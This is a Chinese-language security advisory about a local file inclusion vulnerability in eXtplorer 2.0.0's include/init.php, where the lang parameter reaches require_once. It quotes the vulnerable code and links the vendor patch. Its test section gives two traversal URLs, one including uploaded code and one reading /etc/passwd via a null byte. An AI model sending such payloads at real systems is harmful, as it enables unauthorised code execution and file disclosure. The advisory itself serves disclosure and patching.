eXtplorer include/init.php本地文件包含漏洞
发布日期:2009-03-02
更新日期:2009-03-03
受影响系统:Soeren Eberhardt eXtplorer 2.0.0
不受影响系统:Soeren Eberhardt eXtplorer 2.0.1
描述:
BUGTRAQ ID:
33955
eXtplorer是一款基于web的文件管理组件。
eXtplorer的include/init.php文件没有正确的过滤用户所提交的lang参数,远程攻击者可以通过提交恶意请求包含任意本地资源,导致执行任意代码。以下是include/init.php文件中的有漏洞代码段:
100行:
$GLOBALS["language"] = $mainframe->getUserStateFromRequest(
'language', 'lang', $default_lang );
145行:
// Necessary files
require_once( _EXT_PATH."/config/conf.php" );
if( file_exists(_EXT_PATH."/languages/".$GLOBALS["language"].".php")) {
require_once(
_EXT_PATH."/languages/".$GLOBALS["language"].".php" ); <- HERE
}
else {
require_once( _EXT_PATH."/languages/english.php" );
}
if(
file_exists(_EXT_PATH."/languages/".$GLOBALS["language"]."_mimes.php")) {
require_once(
_EXT_PATH."/languages/".$GLOBALS["language"]."_mimes.php" ); <- HERE
}
else {
require_once( _EXT_PATH."/languages/english_mimes.php" );
}
<*来源:Juan Galiana Lara (
jgaliana@isecauditors.com)
链接:
http://marc.info/?l=bugtraq&m=123603006917930&w=2
http://secunia.com/advisories/34124/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://site/path/?lang=../../path/to/maliciuos_uploaded_code
http://site/path/?lang=../../../../../etc/passwd%00建议:
厂商补丁:
Soeren Eberhardt
----------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://extplorer.sourceforge.net/浏览次数:2313
严重程度:0(网友投票)
